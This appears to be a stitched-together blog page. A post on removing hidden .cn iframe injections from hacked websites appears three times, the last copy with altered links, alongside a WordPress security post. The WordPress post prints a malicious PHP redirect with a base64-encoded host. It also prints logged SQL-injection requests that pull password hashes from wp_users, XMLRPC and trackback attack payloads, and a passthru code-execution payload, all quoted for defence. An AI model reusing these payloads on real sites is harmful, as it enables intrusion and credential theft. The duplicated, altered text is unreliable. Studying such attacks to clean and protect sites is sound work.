Is your website hacked? Website with hidden iframe to .cn website

Ok,

I recently had a couple of my websites hacked, I am not sure if they were hacked or was it some malicious program installed on my computer. Here is what I found. Most of those websites had the following iframe code in index files

iframe src="http:// superbetfair.cn/in.cgi?income43" width=1 height=1 style="visibility: hidden" iframe
(link intentionally broken, for your own safety don't click on it )

The website superbetfair.cn was often replaced by some other website. In almost all cases they were .cn website. e.g.

iframe src="http:// lotmachinesguide.cn/in.cgi?income56" width=1 height=1 style="visibility: hidden" iframe
(link intentionally broken, for your own safety don't click on it )

My first instinct was to simply clean the files. Research on net showed that the infection was almost always in index.php file which made it relatively easier. After having spent four hours cleaning some of deep structured website and wordpress blogs I thought I am over with it. But NO!

Next day or within few hours the infection was back. A few things changed though
In some of the websites the infection was again same iframe code. However, in some other websites the infection was encoded and scrambled with javascripting. In some rare cases it has gone further ahead by scrambling the javascripting with ascii codes. Yes its those weird !56!66 numbers that you see after script tag in your html code.

My first thought analysis was:



1. My host is infected - but I had to disregard that possibility as the infection was on multiple sites across multiple hosts.
2. My password is hacked - again a tough nut for someone to crack unless I was being targeted.
3. My PC has been compromised - Well that kinda make sense, I had my antivirus disabled for last few days because it slows down my internet connection.

So I ran a scan of my PC but there was no infection detected. I knew I am up against something.

Luckily, my friend is a tech support for a renowned company. Gave him a call and he recommended me two softwares.

http://www.malwarebytes.org/

http://www.simplysup.com/tremover/download.html

I ran the first scan with malwarebytes and bingo - It detected over 20 malware and a few registry hacks. Clicked a button and they were gone. Ran a full system scan with malwarebytes.

Next step was to use trojan remover from simplysup - ran a quick scan and it detected a few files and quarantined them. The next step was to run a full system scan. It took around 7 hours to do, detected nothing. Oh btw, both of these softwares came with free trial so I had not spent anything.

The next step was to run up my antivirus (Kaspersky) again and perform a full system scan, this time Kaspersky came up with five possible threats and quarantined them.

The next step was to uninstall my ftp program coreftp till that point. So I installed filezilla client.

Meanwhile I had setup one of my staff members to change all passwords and login information. So by the time I had this done, all the login and password were changed. (If you are suffering from this infection, I highly recommend that you change your passwords etc from some other computer and don't login using your old ftp program)

Once all this was done, I started logging into my websites with new information without storing them in the client and started cleaning the index.php file. Its a gruelsome task but after few hours almost all sites were disinfected. 18 hours have passed and as of now I have not seen it return so I am keeping my fingers crossed.

SPECIAL NOTE TO WORDPRESS USERS

If you are a wordpress blog owner and have this infection, you will have to clean the following files


1. Index.php in root folder
2. index.php in wp-content folder
3. index.php in wp-admin folder
4. index.php in all the themes (all folders in wp-content/theme folder )
5. default-filters.php in the wp-include folder (this is only in some installations)
6. Make sure you change your username and password for wordpress and ftp separately once you have cleaned your blog, also check for any plugin that has any file named index.

If your wordpress is infected then chances are you won't be able to login to your admin panel either.

SPECIAL NOTE TO DRUPAL USERS

If you are seeing a parsing error on opening your drupal based website, that might be because of this infection. Just log in to your ftp account and download the index.php file. Remove the malicious line of code and you should be good to go again.
Please note you will have to change all passwords.

So far all looks good.

Special Note:

I am posting this because a friend of mine called up and asked if I know about this, his website is apparently infected too. I might seem to go through a complex route to solve an easy problem but anyhow that is what worked for me. If you have an easier solution to this, let me know in comments. Also as usual I will suggest you to take backup wherever possible before going through these steps. I won't be liable for any damages, this is just a free advice :)



PS: If this posts helps you in anyway, let me know :)

Is your website hacked? Website with hidden iframe to .cn website

Ok,

I recently had a couple of my websites hacked, I am not sure if they were hacked or was it some malicious program installed on my computer. Here is what I found. Most of those websites had the following iframe code in index files

iframe src="http:// superbetfair.cn/in.cgi?income43" width=1 height=1 style="visibility: hidden" iframe
(link intentionally broken, for your own safety don't click on it )

The website superbetfair.cn was often replaced by some other website. In almost all cases they were .cn website. e.g.

iframe src="http:// lotmachinesguide.cn/in.cgi?income56" width=1 height=1 style="visibility: hidden" iframe
(link intentionally broken, for your own safety don't click on it )

My first instinct was to simply clean the files. Research on net showed that the infection was almost always in index.php file which made it relatively easier. After having spent four hours cleaning some of deep structured website and wordpress blogs I thought I am over with it. But NO!

Next day or within few hours the infection was back. A few things changed though
In some of the websites the infection was again same iframe code. However, in some other websites the infection was encoded and scrambled with javascripting. In some rare cases it has gone further ahead by scrambling the javascripting with ascii codes. Yes its those weird !56!66 numbers that you see after script tag in your html code.

My first thought analysis was:





My host is infected - but I had to disregard that possibility as the infection was on multiple sites across multiple hosts.
My password is hacked - again a tough nut for someone to crack unless I was being targeted.

My PC has been compromised - Well that kinda make sense, I had my antivirus disabled for last few days because it slows down my internet connection.

So I ran a scan of my PC but there was no infection detected. I knew I am up against something.

Luckily, my friend is a tech support for a renowned company. Gave him a call and he recommended me two softwares.

http://www.malwarebytes.org/

http://www.simplysup.com/tremover/download.html

I ran the first scan with malwarebytes and bingo - It detected over 20 malware and a few registry hacks. Clicked a button and they were gone. Ran a full system scan with malwarebytes.

Next step was to use trojan remover from simplysup - ran a quick scan and it detected a few files and quarantined them. The next step was to run a full system scan. It took around 7 hours to do, detected nothing. Oh btw, both of these softwares came with free trial so I had not spent anything.

The next step was to run up my antivirus (Kaspersky) again and perform a full system scan, this time Kaspersky came up with five possible threats and quarantined them.

The next step was to uninstall my ftp program coreftp till that point. So I installed filezilla client.

Meanwhile I had setup one of my staff members to change all passwords and login information. So by the time I had this done, all the login and password were changed. (If you are suffering from this infection, I highly recommend that you change your passwords etc from some other computer and don't login using your old ftp program)

Once all this was done, I started logging into my websites with new information without storing them in the client and started cleaning the index.php file. Its a gruelsome task but after few hours almost all sites were disinfected. 18 hours have passed and as of now I have not seen it return so I am keeping my fingers crossed.

SPECIAL NOTE TO WORDPRESS USERS

If you are a wordpress blog owner and have this infection, you will have to clean the following files



Index.php in root folder
index.php in wp-content folder
index.php in wp-admin folder
index.php in all the themes (all folders in wp-content/theme folder )
default-filters.php in the wp-include folder (this is only in some installations)
Make sure you change your username and password for wordpress and ftp separately once you have cleaned your blog, also check for any plugin that has any file named index.

If your wordpress is infected then chances are you won't be able to login to your admin panel either.

SPECIAL NOTE TO DRUPAL USERS

If you are seeing a parsing error on opening your drupal based website, that might be because of this infection. Just log in to your ftp account and download the index.php file. Remove the malicious line of code and you should be good to go again.
Please note you will have to change all passwords.

So far all looks good.

Special Note:


I am posting this because a friend of mine called up and asked if I know about this, his website is apparently infected too. I might seem to go through a complex route to solve an easy problem but anyhow that is what worked for me. If you have an easier solution to this, let me know in comments. Also as usual I will suggest you to take backup wherever possible before going through these steps. I won't be liable for any damages, this is just a free advice :)



PS: If this posts helps you in anyway, let me know :)


Read More...
Posted in .cn, drupal hack, hacking, iframe, virus, website, website hacked, wordpress hack » Email Post » 2 comments »

Did your WordPress site get hacked?

Remember a few weeks ago there was all that noise about WordPress blogs getting hacked? Remember how everyone was urged to upgrade their blogs. You did upgrade didn’t you? No? It was inevitable that you’d be hacked. If you haven’t been hacked yet, it’s only a matter of time.
Unfortunately for some who did upgrade, it was too late. The hacker slimeballs may have known about the security issues before we did and went about their merry way breaking into blogs and websites, grabbing usernames and passwords, and planting backdoor scripts to log them in again at a later date.That’s how even diligently upgraded blogs were hacked. The bad guys got there before you.

In the last week the hackers have started again. There is no zero day WordPress exploit. There is no evidence that version 2.5.1 of WordPress is vulnerable to any exploit at this time. They’re using the old exploits all over again. This time they’re redirecting hits from Google to your blog. Those hits are instead being redirected to your-needs.info and anyresult.net

If you’ve been hacked
Upgrade to the latest version of WordPress.

Make sure there are no backdoors or malicious code left on your system. This will be in the form of scripts left by the hacker, or modifications to existing files. Check your theme files too.
Change your passwords after upgrading and make sure the hacker didn’t create another user.
Edit your wp-config.php and change or create the SECRET_KEY definition. It should look like this, but do not use the same key or it won’t be very secret, will it?

define(’SECRET_KEY’, ‘1234567890′ );

Hidden Code

The bad guys are using a number of ways to hide their hacks:

The simplest way is hiding their code in your php scripts. If your blog directory and files are writable by the webserver then a hacker has free reign to plant their code anywhere they like. wp-blog-header.php seems to be one place. Theme files are another. When you upgrade WordPress your theme files won’t be overwritten so make sure you double check those files for any strange code that uses the eval() command, or base64_decode(). Here’s a code snippet taken from here:


< ?php $seref=array("google","msn","live","altavista","ask","yahoo","aol","cnn","weather","alexa"); $ser=0; foreach($seref as $ref) if(strpos(strtolower($_SERVER['HTTP_REFERER']),$ref)!==false){ $ser="1"; break; } if($ser=="1" && sizeof($_COOKIE)==0){ header("Location: http://".base64_decode("YW55cmVzdWx0cy5uZXQ=")."/"); exit; }?>< ?php Another hack adds different code to your php files. Look for k1b0rg or keymachine.de in your php scripts and remove that offending code if you find it.

Check your .htaccess file in the root of you blog. If you’ve never edited it, it’ll should look like this:

# BEGIN WordPressRewriteEngine OnRewriteBase /RewriteCond %{REQUEST_FILENAME} !-fRewriteCond %{REQUEST_FILENAME} !-dRewriteRule . /index.php [L]# END WordPress

That file may have this chunk of code too which is to do with the uploader:

SecFilterEngine OffSecFilterScanPOST Off
They’re also uploading PHP code disguised as jpeg files to your upload directory and adding those files to the activated plugins list. This makes it harder to find them, but not impossible:
Open PHPMyAdmin and go to your blog’s options table and find the active_plugins record.
Edit that record. It’s a long line. Scroll through it and you’ll find an entry that looks like ../uploads/2008/05/04/jhjyahjhnjnva.jpg. Remove that text, and make sure you remove the serialized array information for that array record. If that’s beyond you, just delete the active_plugins record and reactivate all your plugins again.
Check your uploads directory for that jpg file and delete it.
This Youtube video shows how to do that. I don’t think there’s any urgent need to remove the rss_* database record but it won’t hurt to do it.
Change Your Passwords



Once you’ve upgraded and verified that your install is clean again you must do the following:
Change the passwords of all users on your system.

Make sure the hacker hasn’t added another user account he can use to login again.
Stop the bad guys

One way of stopping the bad guys before they’ve done any major damage is by doing regular backups and installing an intrusion detection system (IDS).

I use Backuppc to backup all my servers every night, and a simple MySQL backup script to dump the database daily.

The first IDS that springs to mind is Tripwire but there are many others. I just installed AIDE to track changes on this server. What it does is give me a daily report on files that have changed in that period. If a hacker has changed a script or uploaded malicious code I’ll get an email within a day about it. It does take some fine tuning, but it’s easy to install on Debian systems (and presumably as easy on Ubuntu and Red Hat, and even Gentoo..):

# apt-get install aide# vi /etc/aide/aide.conf.d/88_aide_web# /usr/sbin/aideinit
In the configuration file above I put the following:
/home/web/ Checksums!/home/www/logs/.*!/home/web/public_html/wp-content/cache/.*!/home/web/.*/htdocs/wp-content/cache/.*
That will tell AIDE to track changes to my web server folders, but ignore the logs folder and cache folders.

Please Upgrade

There is absolutely no reason not to upgrade. WordPress is famous for it’s 5 minute install, but it takes time and effort to maintain it. If you don’t want the hassle of upgrading, or don’t know how to maintain it, why not get a hosted WordPress account at WordPress.com? Does the $10 you make from advertising every month really justify the time it takes to make sure your site, your writing, your photos and other media are safe? This isn’t an advert for WordPress.com, go with any blogging system you like, but don’t make life easy for the scum out there who’ll take over your out of date software and use it to their advantage.

Help a friend

Check the source code of the blogs you read. The version number in the header will quickly tell you if their version of WordPress is out of date or not. Please leave a comment encouraging them to upgrade! The version number looks like this:

< meta name=" ”generator” "content=" ”WordPress" >

What does a hack look like?

I perform logging on one of my test blogs and I come across all sorts of malicious attempts to break in. Attackers use dumb bots to do their bidding so a website will be hit with all sorts of attacks, even for software that’s not installed. The bots are so dumb they’ll even come back again and again performing the same attacks.
Here’s what I call the “ekibastos attack”. It happens over a number of requests and I’ve seen it come from 87.118.100.81 on a regular basis. It uses a user agent called, “Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)” which strangely enough doesn’t show up on Google at all right now.
First the attacker visits your Dashboard, and then without even checking if that was successful, he tries to access wp-admin/post.php several times using HEAD requests.
Then he POSTs to wp-admin/admin-ajax.php with the following POST body:
POST: Array([cookie] => wordpressuser_c73ce9557defbe87cea780be67f9ae1f=xyz%27; wordpresspass_c73ce9557defbe87cea780be67f9ae1f=132;)
When that fails, he grabs xmlrpc.php.
He then POSTs to that script, exploiting an old and long fixed bug. Here’s a snippet of the data.
HTTP_RAW_POST_DATA:

system.multicall



methodNamepingback.extensions.getPingbacks
params
http://ocaoimh.ie/category/&post_type=%27) UNION ALL SELECT 10048,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4 FROM wp_users WHERE ID=1%2F*
< /blockquote >
That fails too so the query is repeated with similar SQL.
http://ocaoimh.ie/category/&post_type=%27) UNION ALL SELECT 10000%2Bord(substring(user_pass,1,1)),2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4 FROM wp_users WHERE ID=1%2F*
Then he tries a trackback:
URL: /wp-trackback.php?tb_id=1POST: Array([title] => 1[url] => 1[blog_name] => 1[tb_id] => 666666\’[1740009377] => 1[496546471] => 1)
And another trackback:
URL: /wp-trackback.php?p=1POST: Array([url] => ekibastos[title] => ekibastos[excerpt] => ekibastos[blog_name] => +AFw-\’)/*[charset] => UTF-7)
Before finally going back to xmlrpc.php with this POST request:
pingback.pingk1b0rg’ icq: 76-86-20http://ocaoimh.ie/?p=k1b0rg#lsadmin
In between, he also tries the following GET requests:
GET /index.php?cat=%2527+UNION+SELECT+CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58))+FROM+wp_users+where+id=1/* HTTP/1.1GET /index.php?cat=999+UNION+SELECT+null,CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58)),null,null,null+FROM+wp_users+where+id=1/* HTTP/1.1
Thankfully I upgraded and all those attacks fail.
Those requests have been hitting me for months now with the latest happening 2 days ago. If that doesn’t convince you that you must upgrade and check your website, I don’t know what will.
PS. For completeness, here’s another common XMLRPC attack I see all the time. Ironically, this actually hit my server from 189.3.105.2 after I published this post.


test.method



','')); echo
'______BEGIN______';
passthru('id');
echo
'_____FIM_____';
exit;/*



Edit: Tripwire url fixed, thanks Callum
PS. If your site has been hacked, try the WordPress Exploit Scanner which will try to find any modified files and suspicious database records.

Is your website hacked? Website with hidden iframe to .cn website.

Ok,

,I recently had a couple of my websites hacked, I am not sure if they were hacked or was it some malicious program installed on my computer. Here is what I found. Most of those websites had the following

iframe code in index filesiframe src=" http://www.blogger.com/ " width=1 height=1 style="visibility: hidden" iframe(link intentionally broken, for your own safety don't click on it )


The website superbetfair.cn was often replaced by some other website. In almost all cases they were .cn website. e.g.


iframe src="http://www.blogger.com/" width=1 height=1 style="visibility: hidden" iframe(link intentionally broken, for your own safety don't click on it )

My first instinct was to simply clean the files. Research on net showed that the infection was almost always in index.php file which made it relatively easier. After having spent four hours cleaning some of deep structured website and wordpress blogs I thought I am over with it. But NO!

Next day or within few hours the infection was back. A few things changed though
In some of the websites the infection was again same iframe code. However, in some other websites the infection was encoded and scrambled with javascripting. In some rare cases it has gone further ahead by scrambling the javascripting with ascii codes. Yes its those weird !56!66 numbers that you see after script tag in your html code.

My first thought analysis was:


My host is infected - but I had to disregard that possibility as the infection was on multiple sites across multiple hosts.
My password is hacked - again a tough nut for someone to crack unless I was being targeted.

My PC has been compromised - Well that kinda make sense, I had my antivirus disabled for last few days because it slows down my internet connection.

So I ran a scan of my PC but there was no infection detected. I knew I am up against something.

Luckily, my friend is a tech support for a renowned company. Gave him a call and he recommended me two softwares.

http://www.malwarebytes.org/

http://www.simplysup.com/tremover/download.html


I ran the first scan with malwarebytes and bingo - It detected over 20 malware and a few registry hacks. Clicked a button and they were gone. Ran a full system scan with malwarebytes.

Next step was to use trojan remover from simplysup - ran a quick scan and it detected a few files and quarantined them. The next step was to run a full system scan. It took around 7 hours to do, detected nothing. Oh btw, both of these softwares came with free trial so I had not spent anything. The next step was to run up my antivirus (Kaspersky) again and perform a full system scan, this time Kaspersky came up with five possible threats and quarantined them.

The next step was to uninstall my ftp program coreftp till that point. So I installed filezilla client.

Meanwhile I had setup one of my staff members to change all passwords and login information. So by the time I had this done, all the login and password were changed. (If you are suffering from this infection, I highly recommend that you change your passwords etc from some other computer and don't login using your old ftp program)

Once all this was done, I started logging into my websites with new information without storing them in the client and started cleaning the index.php file. Its a gruelsome task but after few hours almost all sites were disinfected. 18 hours have passed and as of now I have not seen it return so I am keeping my fingers crossed.

SPECIAL NOTE TO WORDPRESS USERS

If you are a wordpress blog owner and have this infection, you will have to clean the following files

Index.php in root folder
index.php in wp-content folder
index.php in wp-admin folder
index.php in all the themes (all folders in wp-content/theme folder )
default-filters.php in the wp-include folder (this is only in some installations)
Make sure you change your username and password for wordpress and ftp separately once you have cleaned your blog, also check for any plugin that has any file named index.

If your wordpress is infected then chances are you won't be able to login to your admin panel either.

SPECIAL NOTE TO DRUPAL USERS

If you are seeing a parsing error on opening your drupal based website, that might be because of this infection. Just log in to your ftp account and download the index.php file. Remove the malicious line of code and you should be good to go again.Please note you will have to change all passwords.

So far all looks good.

Special Note:

I am posting this because a friend of mine called up and asked if I know about this, his website is apparently infected too. I might seem to go through a complex route to solve an easy problem but anyhow that is what worked for me. If you have an easier solution to this, let me know in comments. Also as usual I will suggest you to take backup wherever possible before going through these steps. I won't be liable for any damages, this is just a free advice :)

PS: If this posts helps you in anyway, let me know